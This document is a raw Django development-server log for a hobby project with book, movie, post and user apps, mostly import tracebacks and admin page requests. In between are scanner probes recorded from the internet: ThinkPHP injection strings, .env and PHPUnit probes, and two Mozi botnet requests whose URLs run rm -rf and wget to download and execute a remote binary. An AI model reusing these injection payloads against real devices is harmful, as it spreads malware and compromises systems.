  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/book/admin.py", line 2, in <module>
    from models import Book, Book_Author, Author
ModuleNotFoundError: No module named 'models'

/home/ec2-user/ones/book/admin.py changed, reloading.
Watching for file changes with StatReloader
[05/Jul/2021 21:52:36] "GET /admin/ HTTP/1.0" 200 5069
[05/Jul/2021 21:52:41] "GET /admin/book/author/ HTTP/1.0" 200 5756
[05/Jul/2021 21:52:41] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 21:52:41] "GET /static/admin/css/changelists.css HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/js/core.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/js/actions.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/js/jquery.init.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/js/prepopulate.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:41] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 304 0
Not Found: /favicon.ico
[05/Jul/2021 21:52:42] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 21:52:45] "GET /admin/book/book/ HTTP/1.0" 200 5742
[05/Jul/2021 21:52:45] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 21:52:46] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 21:52:47] "GET /admin/book/book_author/ HTTP/1.0" 200 5796
[05/Jul/2021 21:52:47] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 21:52:47] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 21:52:48] "GET /admin/book/book_author/add/ HTTP/1.0" 200 8158
[05/Jul/2021 21:52:48] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 21:52:48] "GET /static/admin/css/forms.css HTTP/1.0" 304 0
[05/Jul/2021 21:52:48] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:48] "GET /static/admin/js/change_form.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:48] "GET /static/admin/css/widgets.css HTTP/1.0" 304 0
Not Found: /favicon.ico
[05/Jul/2021 21:52:48] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 21:52:53] "GET /admin/book/author/ HTTP/1.0" 200 5756
[05/Jul/2021 21:52:53] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 21:52:54] "GET /admin/book/author/add/ HTTP/1.0" 200 6454
[05/Jul/2021 21:52:54] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 21:52:54] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 21:52:57] "GET /admin/book/book/ HTTP/1.0" 200 5742
[05/Jul/2021 21:52:57] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 21:52:58] "GET /admin/book/book/add/ HTTP/1.0" 200 8588
[05/Jul/2021 21:52:58] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 21:52:58] "GET /static/admin/js/calendar.js HTTP/1.0" 304 0
[05/Jul/2021 21:52:58] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.0" 304 0
Not Found: /favicon.ico
[05/Jul/2021 21:52:58] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 21:52:58] "GET /static/admin/img/icon-calendar.svg HTTP/1.0" 304 0
[05/Jul/2021 21:53:03] "GET /admin/book/author/ HTTP/1.0" 200 5756
[05/Jul/2021 21:53:03] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[05/Jul/2021 21:59:15] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 2226
Not Found: /api/jsonws/invoke
[05/Jul/2021 21:59:15] "POST /api/jsonws/invoke HTTP/1.0" 404 2127
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[05/Jul/2021 21:59:16] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 2225
Not Found: /solr/admin/info/system
[05/Jul/2021 21:59:16] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 2149
Not Found: /index.php
[05/Jul/2021 21:59:16] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.0" 404 2221
[05/Jul/2021 21:59:17] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.0" 200 10773
[05/Jul/2021 21:59:17] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 200 10773
Not Found: /wp-content/plugins/wp-file-manager/readme.txt
[05/Jul/2021 21:59:17] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.0" 404 2210
Not Found: /console/
[05/Jul/2021 21:59:18] "GET /console/ HTTP/1.0" 404 2099
Not Found: /Autodiscover/Autodiscover.xml
[05/Jul/2021 21:59:18] "POST /Autodiscover/Autodiscover.xml HTTP/1.0" 404 2163
Not Found: /_ignition/execute-solution
[05/Jul/2021 21:59:18] "GET /_ignition/execute-solution HTTP/1.0" 404 2153
/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 21:52:27
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/movie/models/__init__.py", line 1, in <module>
    from . import Movie, Director, Movie_Director
ImportError: cannot import name 'Movie' from 'movie.models' (/home/ec2-user/ones/movie/models/__init__.py)

/home/ec2-user/ones/movie/models/__init__.py changed, reloading.
Watching for file changes with StatReloader
/home/ec2-user/ones/movie/models/__init__.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 22:02:58
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[05/Jul/2021 22:03:08] "GET /admin/book/author/ HTTP/1.0" 200 6893
[05/Jul/2021 22:03:09] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 22:03:11] "GET /admin/movie/movie_director/ HTTP/1.0" 200 6958
[05/Jul/2021 22:03:11] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:03:11] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:03:11] "GET /admin/movie/movie/ HTTP/1.0" 200 6890
[05/Jul/2021 22:03:11] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:03:11] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:03:12] "GET /admin/movie/director/ HTTP/1.0" 200 6911
[05/Jul/2021 22:03:12] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:03:12] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:03:13] "GET /admin/book/author/ HTTP/1.0" 200 6893
[05/Jul/2021 22:03:13] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 22:02:59
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 118, in inner_run
    self.check(display_num_errors=True)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/base.py", line 469, in check
    raise SystemCheckError(msg)
django.core.management.base.SystemCheckError: SystemCheckError: System check identified some issues:

ERRORS:
post.Reply.replied: (fields.E304) Reverse accessor for 'post.Reply.replied' clashes with reverse accessor for 'post.Reply.replying'.
	HINT: Add or change a related_name argument to the definition for 'post.Reply.replied' or 'post.Reply.replying'.
post.Reply.replying: (fields.E304) Reverse accessor for 'post.Reply.replying' clashes with reverse accessor for 'post.Reply.replied'.
	HINT: Add or change a related_name argument to the definition for 'post.Reply.replying' or 'post.Reply.replied'.

System check identified 2 issues (0 silenced).

/home/ec2-user/ones/post/models/reply.py changed, reloading.
Performing system checks...

Watching for file changes with StatReloader
/home/ec2-user/ones/post/models/reply.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 22:19:51
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[05/Jul/2021 22:20:25] "GET /admin/book/author/ HTTP/1.0" 200 7682
[05/Jul/2021 22:20:25] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 22:20:27] "GET /admin/post/post/ HTTP/1.0" 200 7668
[05/Jul/2021 22:20:28] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:20:28] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:20:28] "GET /admin/post/reply/ HTTP/1.0" 200 7675
[05/Jul/2021 22:20:28] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:20:28] "GET /favicon.ico HTTP/1.0" 404 2108
Not Found: /setup.cgi
[05/Jul/2021 22:22:57] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 2264
[05/Jul/2021 22:24:10] "GET /admin/config.php HTTP/1.0" 302 0
[05/Jul/2021 22:31:36] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 22:31:37] "GET / HTTP/1.0" 200 10773
/home/ec2-user/ones/user/admin.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 22:19:59
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/user/models/__init__.py", line 3, in <module>
    from .like_comment import Like_Comment
  File "/home/ec2-user/ones/user/models/like_comment.py", line 3, in <module>
    from comment.models import Comment
  File "/home/ec2-user/ones/comment/models/__init__.py", line 1, in <module>
    from .comment import Comment
  File "/home/ec2-user/ones/comment/models/comment.py", line 4, in <module>
    class Comment(models.Model):
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/models/base.py", line 116, in __new__
    "INSTALLED_APPS." % (module, name)
RuntimeError: Model class comment.models.comment.Comment doesn't declare an explicit app_label and isn't in an application in INSTALLED_APPS.

/home/ec2-user/ones/user/models/user.py changed, reloading.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/user/models/__init__.py", line 3, in <module>
    from .like_comment import Like_Comment
  File "/home/ec2-user/ones/user/models/like_comment.py", line 3, in <module>
    from comment.models import Comment
  File "/home/ec2-user/ones/comment/models/__init__.py", line 1, in <module>
    from .comment import Comment
  File "/home/ec2-user/ones/comment/models/comment.py", line 4, in <module>
    class Comment(models.Model):
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/models/base.py", line 116, in __new__
    "INSTALLED_APPS." % (module, name)
RuntimeError: Model class comment.models.comment.Comment doesn't declare an explicit app_label and isn't in an application in INSTALLED_APPS.

/home/ec2-user/ones/ones/settings.py changed, reloading.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 121, in inner_run
    self.check_migrations()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/base.py", line 486, in check_migrations
    executor = MigrationExecutor(connections[DEFAULT_DB_ALIAS])
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/executor.py", line 18, in __init__
    self.loader = MigrationLoader(self.connection)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/loader.py", line 53, in __init__
    self.build_graph()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/loader.py", line 214, in build_graph
    self.load_disk()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/loader.py", line 116, in load_disk
    migration_module = import_module(migration_path)
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/user/migrations/0001_initial.py", line 7, in <module>
    class Migration(migrations.Migration):
  File "/home/ec2-user/ones/user/migrations/0001_initial.py", line 36, in Migration
    ('objects', user.models.UserManager()),
AttributeError: module 'user.models' has no attribute 'UserManager'

/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 121, in inner_run
    self.check_migrations()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/base.py", line 486, in check_migrations
    executor = MigrationExecutor(connections[DEFAULT_DB_ALIAS])
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/executor.py", line 18, in __init__
    self.loader = MigrationLoader(self.connection)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/loader.py", line 53, in __init__
    self.build_graph()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/loader.py", line 214, in build_graph
    self.load_disk()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/db/migrations/loader.py", line 116, in load_disk
    migration_module = import_module(migration_path)
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/user/migrations/0001_initial.py", line 7, in <module>
    class Migration(migrations.Migration):
  File "/home/ec2-user/ones/user/migrations/0001_initial.py", line 36, in Migration
    ('objects', user.models.UserManager()),
AttributeError: module 'user.models' has no attribute 'UserManager'

/home/ec2-user/ones/user/models/__init__.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
Watching for file changes with StatReloader
[05/Jul/2021 22:40:09] "GET /admin/ HTTP/1.0" 200 10055
[05/Jul/2021 22:40:18] "GET /admin/book/book/ HTTP/1.0" 200 9419
[05/Jul/2021 22:40:19] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[05/Jul/2021 22:40:22] "GET /admin/comment/comment/ HTTP/1.0" 200 9452
[05/Jul/2021 22:40:22] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:40:23] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:40:26] "GET /admin/comment/comment_of/ HTTP/1.0" 200 9478
[05/Jul/2021 22:40:26] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:40:26] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:40:37] "GET /admin/user/like_comment/ HTTP/1.0" 200 9480
[05/Jul/2021 22:40:37] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:40:37] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:40:43] "GET /admin/user/like_post/ HTTP/1.0" 200 9459
[05/Jul/2021 22:40:43] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:40:43] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 22:44:42] "GET /admin/user/follow/ HTTP/1.0" 200 9433
[05/Jul/2021 22:44:42] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[05/Jul/2021 22:44:42] "GET /favicon.ico HTTP/1.0" 404 2108
Not Found: /shell
[05/Jul/2021 23:23:22] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.188.251.252:47522/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 404 2182
Not Found: /phpmyadmin/index.php
[06/Jul/2021 00:05:39] "GET /phpmyadmin/index.php HTTP/1.0" 404 2135
Not Found: /phpMyAdmin/index.php
[06/Jul/2021 00:05:39] "GET /phpMyAdmin/index.php HTTP/1.0" 404 2135
[06/Jul/2021 00:16:56] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 01:08:27] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 01:11:35] "GET / HTTP/1.0" 200 10773
Not Found: /.env
[06/Jul/2021 01:12:11] "GET /.env HTTP/1.0" 404 2087
[06/Jul/2021 01:12:12] "POST / HTTP/1.0" 200 10773
Not Found: /.env
[06/Jul/2021 01:33:57] "GET /.env HTTP/1.0" 404 2087
[06/Jul/2021 01:33:58] "POST / HTTP/1.0" 200 10773
[06/Jul/2021 02:28:05] "POST / HTTP/1.0" 200 10773
Not Found: /.env
[06/Jul/2021 02:28:06] "GET /.env HTTP/1.0" 404 2087
[06/Jul/2021 02:29:50] "GET / HTTP/1.0" 200 10773
Not Found: /_profiler/phpinfo
[06/Jul/2021 02:31:35] "GET /_profiler/phpinfo HTTP/1.0" 404 2126
[06/Jul/2021 04:26:45] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 04:51:35] "GET / HTTP/1.0" 200 10773
Not Found: /config/getuser
[06/Jul/2021 04:59:57] "GET /config/getuser?index=0 HTTP/1.0" 404 2125
Not Found: /boaform/admin/formLogin
[06/Jul/2021 05:23:40] "POST /boaform/admin/formLogin HTTP/1.0" 404 2145
[06/Jul/2021 05:34:06] "GET / HTTP/1.0" 200 10773
Not Found: /webfig/
[06/Jul/2021 05:34:06] "GET /webfig/ HTTP/1.0" 404 2096
[06/Jul/2021 06:03:04] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 06:58:32] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 06:58:32] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 07:02:52] "GET / HTTP/1.0" 200 10773
Not Found: /boaform/admin/formLogin
[06/Jul/2021 07:06:12] "POST /boaform/admin/formLogin HTTP/1.0" 404 2145
[06/Jul/2021 07:07:02] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 07:47:45] "GET / HTTP/1.0" 200 10773
[06/Jul/2021 07:47:46] "GET / HTTP/1.0" 200 10773
